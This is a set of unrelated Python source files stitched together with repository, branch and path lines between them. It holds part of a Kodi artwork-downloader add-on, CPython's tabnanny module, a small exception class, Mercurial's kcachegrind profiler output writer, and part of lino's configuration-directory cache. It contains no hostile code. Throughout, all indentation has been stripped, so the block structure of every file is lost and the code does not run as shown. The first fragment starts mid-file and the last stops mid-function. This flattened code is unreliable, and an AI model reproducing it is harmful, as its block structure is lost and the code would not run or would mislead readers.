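# The retry loop below distinguishes three outcomes: 'retrying' (HTTP 503 or
# an XML parse error) sleeps api_timedelay and asks the provider again,
# 'skipping' (404, no artwork, unknown id, timeout, download error) moves on,
# and 'pass' accepts the provider's image list.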
while not artwork_result == 'pass' and not artwork_result == 'skipping':
if artwork_result == 'retrying':
xbmc.sleep(setting['api_timedelay'])
try:
temp_image_list = self.provider.get_image_list(currentmedia['id'])
#pass
except HTTP404Error, e:
errmsg = '404: File not found'
artwork_result = 'skipping'
except HTTP503Error, e:
xmlfailcount += 1
errmsg = '503: API Limit Exceeded'
artwork_result = 'retrying'
except NoFanartError, e:
errmsg = 'No artwork found'
artwork_result = 'skipping'
failed_items.append('[%s] %s' %(currentmedia['name'], __localize__(32133)))
except ItemNotFoundError, e:
errmsg = '%s not found' % currentmedia['id']
artwork_result = 'skipping'
except ExpatError, e:
xmlfailcount += 1
errmsg = 'Error parsing xml: %s' % str(e)
artwork_result = 'retrying'
except HTTPTimeout, e:
failcount += 1
errmsg = 'Timed out'
artwork_result = 'skipping'
except DownloadError, e:
failcount += 1
errmsg = 'Possible network error: %s' % str(e)
artwork_result = 'skipping'
else:
artwork_result = 'pass'
for item in temp_image_list:
image_list.append(item)
if not xmlfailcount < setting['xmlfailthreshold']:
artwork_result = 'skipping'
if not artwork_result == 'pass':
log('Error getting data from %s (%s): %s' % (self.provider.name, errmsg, artwork_result))
if len(image_list) > 0:
if (limit['limit_artwork'] and limit['limit_extrafanart_max'] < len(image_list)):
self.download_max = limit['limit_extrafanart_max']
else:
self.download_max = len(image_list)
# Check for GUI mode
if startup['mode'] == 'gui':
log('- Using GUI mode')
self._gui_mode(currentmedia)
elif startup['mode'] == 'custom':
log('- Using custom mode')
self._custom_mode(currentmedia)
else:
#log('- Using bulk mode')
self._download_process(currentmedia)
processeditems += 1
### Processes the different modes for downloading of files
def _download_process(self, currentmedia):
# With the exception of custom mode, run through the art_list to see which types are enabled and build a list of those
# then call _download_art to process it
if not startup['mode'] == 'custom':
global download_arttypes
download_arttypes = []
for art_type in arttype_list:
if art_type['bulk_enabled'] and startup['mediatype'] == art_type['media_type']:
download_arttypes.append(art_type['art_type'])
# do the same but for custom mode
for art_type in arttype_list:
if (art_type['art_type'] in download_arttypes and
((setting['movie_enable'] and startup['mediatype'] == art_type['media_type']) or
(setting['tvshow_enable'] and startup['mediatype'] == art_type['media_type']) or
(setting['musicvideo_enable'] and startup['mediatype'] == art_type['media_type']))):
if art_type['art_type'] == 'extrafanart':
self._download_art(currentmedia, art_type, currentmedia['extrafanartdirs'])
elif art_type['art_type'] == 'extrathumbs':
self._download_art(currentmedia, art_type, currentmedia['extrathumbsdirs'])
else:
self._download_art(currentmedia, art_type, currentmedia['artworkdir'])
### Artwork downloading
def _download_art(self, currentmedia, art_item, targetdirs):
log('* Image type: %s' %art_item['art_type'])
seasonfile_presents = []
current_artwork = 0 # Used in progress dialog
limit_counter = 0 # Used for limiting on number
pref_language = language.get_abbrev() # get abbreviation
i = 0 # Set loop counter
imagefound = False # Set found image false
imageignore = False # Set ignore image false
missingfiles = False
global download_list
final_image_list = []
if startup['mode'] in ['gui', 'customgui'] and not art_item['art_type'] in ['extrafanart', 'extrathumbs']:
final_image_list.append(image_list)
else:
final_image_list = image_list
if len(final_image_list) == 0:
log(' - Nothing to download')
else:
# Preferred-language handling
# loop at most twice, then stop
while (i < 2 and not imagefound):
# when no image found found after one imagelist loop set to english
if not imagefound and i == 1:
pref_language = 'en'
log('! No matching %s artwork found. Searching for English backup' %limit['limit_preferred_language'])
# loop through image list
for artwork in final_image_list:
if art_item['art_type'] in artwork['art_type']:
### check if script has been cancelled by user
if dialog_msg('iscanceled',
background = setting['background']):
#dialog('close', background = setting['background'])
break
# Create an image info list
item = {'url': artwork['url'],
'targetdirs': targetdirs,
'media_name': currentmedia['name'],
'mediatype':currentmedia['mediatype'],
'artwork_string': art_item['gui_string'],
'artwork_details': artwork,
'dbid':currentmedia['dbid'],
'art':currentmedia['art'],
'art_type':art_item['art_type']}
# raise artwork counter only on first loop
if i != 1:
current_artwork += 1
# File naming
if art_item['art_type'] == 'extrafanart':
item['filename'] = ('%s.jpg'% artwork['id'])
elif art_item['art_type'] == 'extrathumbs':
item['filename'] = (art_item['filename'] % str(limit_counter + 1))
elif art_item['art_type'] in ['seasonposter']:
if artwork['season'] == '0':
item['filename'] = "season-specials-poster.jpg"
elif artwork['season'] == 'all':
item['filename'] = "season-all-poster.jpg"
elif artwork['season'] == 'n/a':
break
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
elif art_item['art_type'] in ['seasonbanner']:
if artwork['season'] == '0':
item['filename'] = "season-specials-banner.jpg"
elif artwork['season'] == 'all':
item['filename'] = "season-all-banner.jpg"
elif artwork['season'] == 'n/a':
break
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
elif art_item['art_type'] in ['seasonlandscape']:
if artwork['season'] == 'all' or artwork['season'] == '':
item['filename'] = "season-all-landscape.jpg"
else:
item['filename'] = (art_item['filename'] % int(artwork['season']))
else:
item['filename'] = art_item['filename']
for targetdir in item['targetdirs']:
item['localfilename'] = os.path.join(targetdir, item['filename']).encode('utf-8')
break
# Continue
if startup['mode'] in ['gui', 'customgui'] and not art_item['art_type'] in ['extrafanart', 'extrathumbs']:
# Add image to download list
download_list.append(item)
# jump out of the loop
imagefound = True
else:
# Check for set limits
if (setting['files_local'] and not
item['url'].startswith('http') and not
art_item['art_type'] in ['extrafanart', 'extrathumbs']):
# if it's a local file use this first
limited = [False, 'This is your local file']
elif art_item['art_type'] == 'discart':
limited = filter(art_item['art_type'],
startup['mediatype'],
item['artwork_details'],
limit_counter,
pref_language,
currentmedia['disctype'])
else:
limited = filter(art_item['art_type'],
startup['mediatype'],
item['artwork_details'],
limit_counter,
pref_language)
# Delete extrafanart when below the configured limits, passing along the reason message
if limited[0] and not i == 1 and art_item['art_type'] in ['extrafanart', 'extrathumbs']:
#self.fileops._delete_file_in_dirs(item['filename'], item['targetdirs'], limited[1],currentmedia['name'])
pass
# Just ignore image when it's below settings
elif limited[0]:
imageignore = True
log(' - Ignoring (%s): %s' % (limited[1], item['filename']))
else:
# Always add to list when set to overwrite
if setting['files_overwrite']:
log(' - Adding to download list (overwrite enabled): %s' % item['filename'])
download_list.append(item)
imagefound = True
else:
artcheck = item['art']
# Check if the extrathumbs/extrafanart image already exists locally
if art_item['art_type'] in ['extrathumbs','extrafanart']:
for targetdir in item['targetdirs']:
if not self.fileops._exists(os.path.join(targetdir, item['filename'])):
missingfiles = True
# Check if the image already exists in the database
elif not art_item['art_type'] in ['seasonlandscape','seasonbanner','seasonposter']:
if setting['files_local'] and not self.fileops._exists(item['localfilename']):
missingfiles = True
elif not artcheck.get(art_item['art_type']):
missingfiles = True
if missingfiles:
# If missing add to list
imagefound = True
log(' - Adding to download list (does not exist in all target directories): %s' % item['filename'])
download_list.append(item)
else:
imagefound = True
log(' - Ignoring (Exists in all target directories): %s' % item['filename'])
# Raise limit counter because image was added to list or it already existed
limit_counter += 1
# Check if artwork doesn't exist and the ones available are below settings even after searching for English fallback
if limited[0] and imageignore and i == 1:
for targetdir in item['targetdirs']:
if (not self.fileops._exists(os.path.join (targetdir,item['filename'])) and not
art_item['art_type'] in ['extrafanart', 'extrathumbs']):
failed_items.append('[%s] %s %s' % (currentmedia['name'], art_item['art_type'], __localize__(32147)))
# Do a special check on season artwork
if art_item['art_type'] == 'seasonlandscape' or art_item['art_type'] == 'seasonbanner' or art_item['art_type'] == 'seasonposter':
# If already present in the list, set the limit to 1 so it is skipped
limit_counter = 0
if artwork['season'] in seasonfile_presents:
log('seasonnumber: %s' %artwork['season'])
limit_counter = 1
# If not present in the list but an image was found, add it to the list and reset the limit counter
elif imagefound:
seasonfile_presents.append(artwork['season'])
log('Seasons present: %s' %seasonfile_presents)
# if not found and not already in the list, keep imagefound False
else:
imagefound = False
# Bump the counter so the loop runs at most twice when nothing is found
i += 1
# Don't loop again when the preferred language is English, because that is the same as the backup
if pref_language == 'en':
i += 2
# Add to failed items if 0
if current_artwork == 0:
failed_items.append('[%s] %s %s' % (currentmedia['name'], art_item['art_type'], __localize__(32022)))
# Print log message number of found images per art type
log(' - Found a total of: %s %s' % (current_artwork, art_item['art_type']))
# End of language handling
def _batch_download(self, image_list):
log('########################################################')
global download_counter
global download_succes
global reportdata
image_list_total = len(image_list)
if not image_list_total == 0:
failcount = 0
for item in image_list:
if xbmc.abortRequested:
reportdata += ('\n - %s: %s' %(__localize__(32150), time.strftime('%d %B %Y - %H:%M')))
break
if dialog_msg('iscanceled',
background = setting['background']):
reportdata += ('\n - %s: %s' %(__localize__(32153), time.strftime('%d %B %Y - %H:%M')))
break
dialog_msg('update',
percentage = int(float(download_counter['Total Artwork']) / float(image_list_total) * 100.0),
line1 = item['media_name'],
line2 = __localize__(32009) + ' ' + __localize__(item['artwork_string']),
line3 = item['filename'], background = setting['background'])
# Try downloading the file and catch errors while trying to
try:
if setting['files_local'] and not item['art_type'] in ['extrafanart', 'extrathumbs']:
if ((not self.fileops._exists(item['localfilename']) or
startup['mode'] == 'customgui' or
startup['mode'] == 'gui') and
item['url'].startswith('http')):
self.fileops._downloadfile(item)
item['url'] = item['localfilename'].replace('\\','\\\\')
if item['art_type'] in ['extrathumbs', 'extrafanart']:
self.fileops._downloadfile(item)
elif item['mediatype'] == 'movie':
xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetMovieDetails", "params": { "movieid": %i, "art": { "%s": "%s" }}, "id": 1 }' %(item['dbid'], item['art_type'], item['url']))
elif item['mediatype'] == 'tvshow':
xbmc.executeJSONRPC('{"jsonrpc": "2.0", "method": "VideoLibrary.SetTVShowDetails", "params": { "tvshowid": %i, "art": { "%s": "%s" }}, "id": 1 }' %(item['dbid'], item['art_type'], item['url']))
except HTTP404Error, e:
log('URL not found: %s' % str(e), xbmc.LOGERROR)
download_succes = False
except HTTPTimeout, e:
failcount += 1
log('Download timed out: %s' % str(e), xbmc.LOGERROR)
download_succes = False
except CreateDirectoryError, e:
log('Could not create directory, skipping: %s' % str(e), xbmc.LOGWARNING)
download_succes = False
except CopyError, e:
log('Could not copy file (Destination may be read only), skipping: %s' % str(e), xbmc.LOGWARNING)
download_succes = False
except DownloadError, e:
failcount += 1
log('Error downloading file: %s (Possible network error: %s), skipping' % (item['url'], str(e)), xbmc.LOGERROR)
download_succes = False
else:
try:
download_counter[__localize__(item['artwork_string'])] += 1
except KeyError:
download_counter[__localize__(item['artwork_string'])] = 1
download_counter['Total Artwork'] += 1
download_succes = True
log('Finished download')
### This handles the GUI image type selector part
def _gui_mode(self, currentmedia):
global download_arttypes
global image_list
# Close the 'checking for artwork' dialog before opening the GUI list
dialog_msg('close',
background = setting['background'])
# Look for argument matching artwork types
for item in sys.argv:
for type in arttype_list:
if item == type['art_type'] and startup['mediatype'] == type['media_type']:
log('- Custom %s mode art_type: %s' %(type['media_type'],type['art_type']))
download_arttypes.append(item)
gui_selected_type = False
# If only one specified and not extrafanart/extrathumbs
if ((len(download_arttypes) == 1) and
startup['dbid'] and not
'extrathumbs' in download_arttypes and not
'extrafanart' in download_arttypes):
imagelist = False
for gui_arttype in download_arttypes:
gui_selected_type = gui_arttype
break
# Parse the image-type restraints
if gui_selected_type:
for arttype in arttype_list:
if gui_selected_type == arttype['art_type'] and startup['mediatype'] == arttype['media_type']:
# Get image list for that specific imagetype
imagelist = gui_imagelist(image_list, gui_selected_type)
# Some debug log output
for image in imagelist:
log('- Image put to GUI: %s' %image)
break
else:
# Create an empty list and flag that no image list is available yet
enabled_type_list = []
imagelist = False
# Fill GUI art type list
for arttype in arttype_list:
if (arttype['solo_enabled'] == 'true' and
startup['mediatype'] == arttype['media_type'] and
hasimages(image_list, arttype['art_type'])):
gui = __localize__(arttype['gui_string'])
enabled_type_list.append(gui)
# With only one enabled type, flag it as 'True' so choice_type can auto-select it
if len(enabled_type_list) == 1:
enabled_type_list[0] = 'True'
# Fill imagelist with the images that fit the selected image type
type_list = choice_type(enabled_type_list, startup, arttype_list)
if (len(enabled_type_list) == 1) or type_list:
imagelist = gui_imagelist(image_list, type_list['art_type'])
# Some debug log output
for image in imagelist:
log('- Image put to GUI: %s' %image)
# Download the selected image
# If there's a list, send the imagelist to the selection dialog
if imagelist:
image_list = choose_image(imagelist)
if image_list:
# Create a progress dialog so you can see the progress,
# send the selected image for processing and initiate the batch download
dialog_msg('create')
for art_type in arttype_list:
if image_list['art_type'][0] == art_type['art_type']:
self._download_art(currentmedia, art_type, currentmedia['artworkdir'])
self._batch_download(download_list)
break
# When not successful, show a failure dialog
if not download_succes:
dialog_msg('okdialog',
line1 = __localize__(32006),
line2 = __localize__(32007))
# When no images found or nothing selected
if not imagelist and gui_selected_type:
log('- No artwork found')
dialog_msg('okdialog',
line1 = currentmedia['name'],
line2 = __localize__(arttype['gui_string']) + ' ' + __localize__(32022))
# When the download was successful
elif download_succes:
log('- Download successful')
# Selection was cancelled
else:
global cancelled
cancelled = True
def _custom_mode(self, currentmedia):
global download_arttypes
global image_list
global startup
# Look for argument matching artwork types
for item in sys.argv:
for type in arttype_list:
if item == type['art_type'] and startup['mediatype'] == type['media_type']:
log('- Custom %s mode art_type: %s' %(type['media_type'],type['art_type']))
download_arttypes.append(item)
# If only one specified and not extrafanart/extrathumbs
if ((len(download_arttypes) == 1) and
startup['dbid'] and not
'extrathumbs' in download_arttypes and not
'extrafanart' in download_arttypes):
# Get image list for that specific imagetype
for gui_arttype in download_arttypes:
imagelist = gui_imagelist(image_list, gui_arttype)
log('- Number of images: %s' %len(imagelist))
# If more images than 1 found show GUI selection
if len(imagelist) > 1:
dialog_msg('close',
background = setting['background'])
startup['mode'] = 'customgui'
log('- Image list larger than 1')
image_list = choose_image(imagelist)
if image_list:
log('- Chosen: %s'% image_list)
dialog_msg('create')
for item in arttype_list:
if gui_arttype == item['art_type']:
self._download_art(currentmedia,
item,
currentmedia['artworkdir'])
break
self._batch_download(download_list)
if not download_succes:
dialog_msg('okdialog',
line1 = __localize__(32006),
line2 = __localize__(32007))
if download_succes:
log('- Download successful')
else:
log('- Cancelled')
global cancelled
cancelled = True
else:
self._download_process(currentmedia)
log('- Not more than one image available')
# If more than one specified
else:
log('- Start custom bulkmode')
self._download_process(currentmedia)
### Start of script
if (__name__ == '__main__'):
log('######## Artwork Downloader: Initializing...............................', xbmc.LOGNOTICE)
log('## Add-on Name = %s' % str(__addonname__), xbmc.LOGNOTICE)
log('## Version = %s' % str(__version__), xbmc.LOGNOTICE)
Main()
log('script stopped', xbmc.LOGNOTICE)
|
ybellavance/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/tabnanny.py
|
47
|
#! /usr/bin/env python3
"""The Tab Nanny despises ambiguous indentation. She knows no mercy.
tabnanny -- Detection of ambiguous indentation
For the time being this module is intended to be called as a script.
However it is possible to import it into an IDE and use the function
check() described below.
Warning: The API provided by this module is likely to change in future
releases; such changes may not be backward compatible.
"""
# Released to the public domain, by Tim Peters, 15 April 1998.
# XXX Note: this is now a standard library module.
# XXX The API needs to undergo changes however; the current code is too
# XXX script-like. This will be addressed later.
__version__ = "6"
import os
import sys
import getopt
import tokenize
if not hasattr(tokenize, 'NL'):
raise ValueError("tokenize.NL doesn't exist -- tokenize module too old")
__all__ = ["check", "NannyNag", "process_tokens"]
verbose = 0
filename_only = 0
def errprint(*args):
sep = ""
for arg in args:
sys.stderr.write(sep + str(arg))
sep = " "
sys.stderr.write("\n")
def main():
global verbose, filename_only
try:
opts, args = getopt.getopt(sys.argv[1:], "qv")
except getopt.error as msg:
errprint(msg)
return
for o, a in opts:
if o == '-q':
filename_only = filename_only + 1
if o == '-v':
verbose = verbose + 1
if not args:
errprint("Usage:", sys.argv[0], "[-v] file_or_directory ...")
return
for arg in args:
check(arg)
class NannyNag(Exception):
"""
Raised by tokeneater() if detecting an ambiguous indent.
Captured and handled in check().
"""
def __init__(self, lineno, msg, line):
self.lineno, self.msg, self.line = lineno, msg, line
def get_lineno(self):
return self.lineno
def get_msg(self):
return self.msg
def get_line(self):
return self.line
def check(file):
"""check(file_or_dir)
If file_or_dir is a directory and not a symbolic link, then recursively
descend the directory tree named by file_or_dir, checking all .py files
along the way. If file_or_dir is an ordinary Python source file, it is
checked for whitespace related problems. The diagnostic messages are
written to standard output using the print function.
"""
if os.path.isdir(file) and not os.path.islink(file):
if verbose:
print("%r: listing directory" % (file,))
names = os.listdir(file)
for name in names:
fullname = os.path.join(file, name)
if (os.path.isdir(fullname) and
not os.path.islink(fullname) or
os.path.normcase(name[-3:]) == ".py"):
check(fullname)
return
try:
f = tokenize.open(file)
except IOError as msg:
errprint("%r: I/O Error: %s" % (file, msg))
return
if verbose > 1:
print("checking %r ..." % file)
try:
process_tokens(tokenize.generate_tokens(f.readline))
except tokenize.TokenError as msg:
errprint("%r: Token Error: %s" % (file, msg))
return
except IndentationError as msg:
errprint("%r: Indentation Error: %s" % (file, msg))
return
except NannyNag as nag:
badline = nag.get_lineno()
line = nag.get_line()
if verbose:
print("%r: *** Line %d: trouble in tab city! ***" % (file, badline))
print("offending line: %r" % (line,))
print(nag.get_msg())
else:
if ' ' in file: file = '"' + file + '"'
if filename_only: print(file)
else: print(file, badline, repr(line))
return
if verbose:
print("%r: Clean bill of health." % (file,))
class Whitespace:
# the characters used for space and tab
S, T = ' \t'
# members:
# raw
# the original string
# n
# the number of leading whitespace characters in raw
# nt
# the number of tabs in raw[:n]
# norm
# the normal form as a pair (count, trailing), where:
# count
# a tuple such that raw[:n] contains count[i]
# instances of S * i + T
# trailing
# the number of trailing spaces in raw[:n]
# It's A Theorem that m.indent_level(t) ==
# n.indent_level(t) for all t >= 1 iff m.norm == n.norm.
# is_simple
# true iff raw[:n] is of the form (T*)(S*)
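# A worked illustration (not part of the original module): for
# ws == " \t\t  " the constructor computes n == 5, nt == 2 and
# norm == ((1, 1), 2), i.e. one bare tab (S*0 + T), one " \t" (S*1 + T)
# and two trailing spaces; is_simple is False since len(count) > 1.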
def __init__(self, ws):
self.raw = ws
S, T = Whitespace.S, Whitespace.T
count = []
b = n = nt = 0
for ch in self.raw:
if ch == S:
n = n + 1
b = b + 1
elif ch == T:
n = n + 1
nt = nt + 1
if b >= len(count):
count = count + [0] * (b - len(count) + 1)
count[b] = count[b] + 1
b = 0
else:
break
self.n = n
self.nt = nt
self.norm = tuple(count), b
self.is_simple = len(count) <= 1
# return length of longest contiguous run of spaces (whether or not
# preceding a tab)
def longest_run_of_spaces(self):
count, trailing = self.norm
return max(len(count)-1, trailing)
def indent_level(self, tabsize):
# count, il = self.norm
# for i in range(len(count)):
# if count[i]:
# il = il + (i/tabsize + 1)*tabsize * count[i]
# return il
# quicker:
# il = trailing + sum (i/ts + 1)*ts*count[i] =
# trailing + ts * sum (i/ts + 1)*count[i] =
# trailing + ts * sum i/ts*count[i] + count[i] =
# trailing + ts * [(sum i/ts*count[i]) + (sum count[i])] =
# trailing + ts * [(sum i/ts*count[i]) + num_tabs]
# and note that i/ts*count[i] is 0 when i < ts
count, trailing = self.norm
il = 0
for i in range(tabsize, len(count)):
il = il + i//tabsize * count[i]
return trailing + tabsize * (il + self.nt)
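# Worked example (illustrative): Whitespace("  \t").indent_level(8) == 8
# and Whitespace("  \t").indent_level(4) == 4; two spaces followed by a
# tab always land on the next tab stop, whatever the tab size.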
# return true iff self.indent_level(t) == other.indent_level(t)
# for all t >= 1
def equal(self, other):
return self.norm == other.norm
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) != other.indent_level(ts) == i2.
# Intended to be used after not self.equal(other) is known, in which
# case it will return at least one witnessing tab size.
def not_equal_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) != other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
# Return True iff self.indent_level(t) < other.indent_level(t)
# for all t >= 1.
# The algorithm is due to Vincent Broman.
# Easy to prove it's correct.
# XXXpost that.
# Trivial to prove n is sharp (consider T vs ST).
# Unknown whether there's a faster general way. I suspected so at
# first, but no longer.
# For the special (but common!) case where M and N are both of the
# form (T*)(S*), M.less(N) iff M.len() < N.len() and
# M.num_tabs() <= N.num_tabs(). Proof is easy but kinda long-winded.
# XXXwrite that up.
# Note that M is of the form (T*)(S*) iff len(M.norm[0]) <= 1.
def less(self, other):
if self.n >= other.n:
return False
if self.is_simple and other.is_simple:
return self.nt <= other.nt
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
# the self.n >= other.n test already did it for ts=1
for ts in range(2, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
return False
return True
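# Worked example (illustrative): Whitespace("\t").less(Whitespace("\t    "))
# is True (both are simple; one tab each, the second adds spaces), while
# Whitespace("    ").less(Whitespace("\t")) is False because self.n >=
# other.n; at tab size 1 four spaces indent past a single tab.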
# return a list of tuples (ts, i1, i2) such that
# i1 == self.indent_level(ts) >= other.indent_level(ts) == i2.
# Intended to be used after not self.less(other) is known, in which
# case it will return at least one witnessing tab size.
def not_less_witness(self, other):
n = max(self.longest_run_of_spaces(),
other.longest_run_of_spaces()) + 1
a = []
for ts in range(1, n+1):
if self.indent_level(ts) >= other.indent_level(ts):
a.append( (ts,
self.indent_level(ts),
other.indent_level(ts)) )
return a
def format_witnesses(w):
firsts = (str(tup[0]) for tup in w)
prefix = "at tab size"
if len(w) > 1:
prefix = prefix + "s"
return prefix + " " + ', '.join(firsts)
def process_tokens(tokens):
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
NEWLINE = tokenize.NEWLINE
JUNK = tokenize.COMMENT, tokenize.NL
indents = [Whitespace("")]
check_equal = 0
for (type, token, start, end, line) in tokens:
if type == NEWLINE:
# a program statement, or ENDMARKER, will eventually follow,
# after some (possibly empty) run of tokens of the form
# (NL | COMMENT)* (INDENT | DEDENT+)?
# If an INDENT appears, setting check_equal is wrong, and will
# be undone when we see the INDENT.
check_equal = 1
elif type == INDENT:
check_equal = 0
thisguy = Whitespace(token)
if not indents[-1].less(thisguy):
witness = indents[-1].not_less_witness(thisguy)
msg = "indent not greater e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
indents.append(thisguy)
elif type == DEDENT:
# there's nothing we need to check here! what's important is
# that when the run of DEDENTs ends, the indentation of the
# program statement (or ENDMARKER) that triggered the run is
# equal to what's left at the top of the indents stack
# Ouch! This assert triggers if the last line of the source
# is indented *and* lacks a newline -- then DEDENTs pop out
# of thin air.
# assert check_equal # else no earlier NEWLINE, or an earlier INDENT
check_equal = 1
del indents[-1]
elif check_equal and type not in JUNK:
# this is the first "real token" following a NEWLINE, so it
# must be the first token of the next program statement, or an
# ENDMARKER; the "line" argument exposes the leading whitespace
# for this statement; in the case of ENDMARKER, line is an empty
# string, so will properly match the empty string with which the
# "indents" stack was seeded
check_equal = 0
thisguy = Whitespace(line)
if not indents[-1].equal(thisguy):
witness = indents[-1].not_equal_witness(thisguy)
msg = "indent not equal e.g. " + format_witnesses(witness)
raise NannyNag(start[0], msg, line)
if __name__ == '__main__':
main()
|
tom-heimbrodt/oeplatform
|
refs/heads/develop
|
dataedit/metadata/error.py
|
1
|
class MetadataException(Exception):
def __init__(self, metadata, error):
self.metadata = metadata
self.error = error
|
romankagan/DDBWorkbench
|
refs/heads/master
|
plugins/hg4idea/testData/bin/mercurial/lsprofcalltree.py
|
100
|
"""
lsprofcalltree.py - lsprof output which is readable by kcachegrind
Authors:
* David Allouche <david <at> allouche.net>
* Jp Calderone & Itamar Shtull-Trauring
* Johan Dahlin
This software may be used and distributed according to the terms
of the GNU General Public License, incorporated herein by reference.
"""
def label(code):
if isinstance(code, str):
return '~' + code # built-in functions ('~' sorts at the end)
else:
return '%s %s:%d' % (code.co_name,
code.co_filename,
code.co_firstlineno)
class KCacheGrind(object):
def __init__(self, profiler):
self.data = profiler.getstats()
self.out_file = None
def output(self, out_file):
self.out_file = out_file
print >> out_file, 'events: Ticks'
self._print_summary()
for entry in self.data:
self._entry(entry)
def _print_summary(self):
max_cost = 0
for entry in self.data:
totaltime = int(entry.totaltime * 1000)
max_cost = max(max_cost, totaltime)
print >> self.out_file, 'summary: %d' % (max_cost,)
def _entry(self, entry):
out_file = self.out_file
code = entry.code
#print >> out_file, 'ob=%s' % (code.co_filename,)
if isinstance(code, str):
print >> out_file, 'fi=~'
else:
print >> out_file, 'fi=%s' % (code.co_filename,)
print >> out_file, 'fn=%s' % (label(code),)
inlinetime = int(entry.inlinetime * 1000)
if isinstance(code, str):
print >> out_file, '0 ', inlinetime
else:
print >> out_file, '%d %d' % (code.co_firstlineno, inlinetime)
# recursive calls are counted in entry.calls
if entry.calls:
calls = entry.calls
else:
calls = []
if isinstance(code, str):
lineno = 0
else:
lineno = code.co_firstlineno
for subentry in calls:
self._subentry(lineno, subentry)
print >> out_file
def _subentry(self, lineno, subentry):
out_file = self.out_file
code = subentry.code
#print >> out_file, 'cob=%s' % (code.co_filename,)
print >> out_file, 'cfn=%s' % (label(code),)
if isinstance(code, str):
print >> out_file, 'cfi=~'
print >> out_file, 'calls=%d 0' % (subentry.callcount,)
else:
print >> out_file, 'cfi=%s' % (code.co_filename,)
print >> out_file, 'calls=%d %d' % (
subentry.callcount, code.co_firstlineno)
totaltime = int(subentry.totaltime * 1000)
print >> out_file, '%d %d' % (lineno, totaltime)
|
khchine5/lino
|
refs/heads/master
|
lino/utils/config.py
|
1
|
# -*- coding: UTF-8 -*-
# Copyright 2009-2017 Luc Saffre
# License: BSD (see file COPYING for details)
"""This defines the :class:`ConfigDirCache` which Lino instantiates
and installs as :attr:`SITE.confdirs
<lino.core.site.Site.confdirs>`.
It creates a list `config_dirs` of all configuration directories by
looping through :attr:`lino.core.site.Site.installed_plugins` and taking those
whose source directory has a :xfile:`config` subdir.
The mechanism in this module emulates the behaviour of Django's and
Jinja's template loaders.
We cannot use the Jinja loader because Jinja's `get_template` method
returns a `Template`, and Jinja templates don't know their filename.
One possibility might be to write a special Jinja Template class...
"""
from __future__ import unicode_literals
from builtins import object
import logging
logger = logging.getLogger(__name__)
import os
from os.path import join, abspath, dirname, isdir
import sys
import codecs
from fnmatch import fnmatch
import six
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
from lino.utils import iif
SUBDIR_NAME = 'config' # we might change this to "templates"
class ConfigDir(object):
"""A directory that may contain configuration files.
"""
def __init__(self, name, writeable):
self.name = abspath(name)
self.writeable = writeable
def __repr__(self):
return "ConfigDir %s" % self.name + iif(
self.writeable, " (writeable)", "")
class ConfigDirCache(object):
_init = False
def __init__(self, site):
if self._init:
raise Exception("Oops, ConfigDirCache was already instantiated!")
self._init = True
self.site = site
self.scan_config_dirs()
def scan_config_dirs(self):
"""Scan the file system and populate :attr:`config_dirs`."""
config_dirs = []
for pth in self.site.get_settings_subdirs(SUBDIR_NAME):
if six.PY2:
pth = pth.decode(fs_encoding)
config_dirs.append(ConfigDir(pth, False))
def add_config_dir(name, mod):
pth = join(dirname(mod.__file__), SUBDIR_NAME)
if isdir(pth):
# logger.info("add_config_dir %s %s", name, pth)
# config_dirs.append(ConfigDir(pth.decode(fs_encoding), False))
config_dirs.append(ConfigDir(pth, False))
self.site.for_each_app(add_config_dir)
self.LOCAL_CONFIG_DIR = None
p = self.site.cache_dir.child(SUBDIR_NAME)
if isdir(p):
self.LOCAL_CONFIG_DIR = ConfigDir(p, True)
config_dirs.append(self.LOCAL_CONFIG_DIR)
config_dirs.reverse()
self.config_dirs = tuple(config_dirs)
# logger.info('config_dirs:\n%s', '\n'.join([
# repr(cd) for cd in config_dirs]))
def find_config_file(self, fn, *groups):
"""
Return the full path of the first occurence within the
:class:`lino.utils.config.ConfigDirCache` of a file named
`filename`
"""
if os.path.isabs(fn):
return fn
if len(groups) == 0:
groups = ['']
for group in groups:
if group:
prefix = join(*(group.split('/')))
else:
prefix = ''
for cd in self.config_dirs:
ffn = join(cd.name, prefix, fn)
if os.path.exists(ffn):
return ffn
def find_config_files(self, pattern, *groups):
"""
Returns a dict of `filename` -> `config_dir` entries for each config
file on this site that matches the pattern. Loops through
`config_dirs` and collects matching files. When a filename is
provided by more than one app, then the latest app gets it.
`groups` is a tuple of strings, e.g. '', 'foo', 'foo/bar', ...
"""
files = {}
for group in groups:
if group:
prefix = os.path.sep + join(*(group.split('/')))
else:
prefix = ''
for cd in self.config_dirs:
pth = cd.name + prefix
if isdir(pth):
for fn in os.listdir(pth):
if fnmatch(fn, pattern):
files.setdefault(fn, cd)
return files
def find_template_config_files(self, template_ext, *groups):
"""
Like :func:`find_config_files`, but ignore babel variants:
e.g. ignore "foo_fr.html" if "foo.html" exists.
Note: but don't ignore "my_template.html"
"""
files = self.find_config_files('*' + template_ext, *groups)
l = []
for name in list(files.keys()):
basename = name[:-len(template_ext)]
chunks = basename.split('_')
if len(chunks) > 1:
basename = '_'.join(chunks[:-1])
if basename + template_ext in files:
continue
l.append(name)
l.sort()
if not l:
logger.warning(
"find_template_config_files() : no matches for (%r, %r)",
'*' + template_ext, groups)
return l
def load_config_files(self, loader, pattern, *groups):
"""
Currently not used.
Naming conventions for :xfile:`*.dtl` files are:
- the first detail is called appname.Model.dtl
- If there are more Details, then they are called
appname.Model.2.dtl, appname.Model.3.dtl etc.
The `sort()` below must remove the filename extension (".dtl")
because otherwise the first Detail would come last.
"""
files = list(self.find_config_files(pattern, *groups).items())
def fcmp(a):
return a[0][:-4]
files.sort(key=fcmp)
for group in groups:
prefix = group.replace("/", os.sep)
for filename, cd in files:
filename = join(prefix, filename)
ffn = join(cd.name, filename)
logger.debug("Loading %s...", ffn)
